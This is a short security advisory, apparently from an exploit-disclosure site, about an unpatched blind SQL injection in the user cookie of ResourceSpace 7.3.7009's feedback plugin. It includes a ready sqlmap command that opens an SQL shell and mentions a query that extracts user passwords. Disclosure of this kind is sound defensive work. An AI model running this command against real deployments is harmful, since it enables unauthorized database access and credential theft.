ResourceSpace CMS 7.3.7009 SQL Injection

2015-08-25 / 2015-10-25
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Title: Blind boolean sql injection vulnerability in ResourceSpace CMS Author: William F. Reyor III Contact: opticfiber@gmail.com Published: August 22 2015 Vendor: Montala Limited Vendor url: www.resourcespace.org Software: ResourceSpace Digital Asset Management Software Versions: 7.3.7009 and prior Status: Unpatched Vulnerable scripts: /plugins/feedback/pages/feedback.php Description: There is blind boolean SQL injection vulnerability in the user cookie on the /plugins/feedback/pages/feedback.php application. This can be validated with sqlmap with the following flags, giving a full sql shell: ./sqlmap.py -u "http://<hostname>/plugins/feedback/pages/feedback.php" --cookie="user=test" --level=2 --technique=B --sql-shell This also allows an attacker to execute arbitrary queries such as 'select username, password, usergroup from user -- William Reyor *"L'essentiel est invisible pour les yeux"*


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top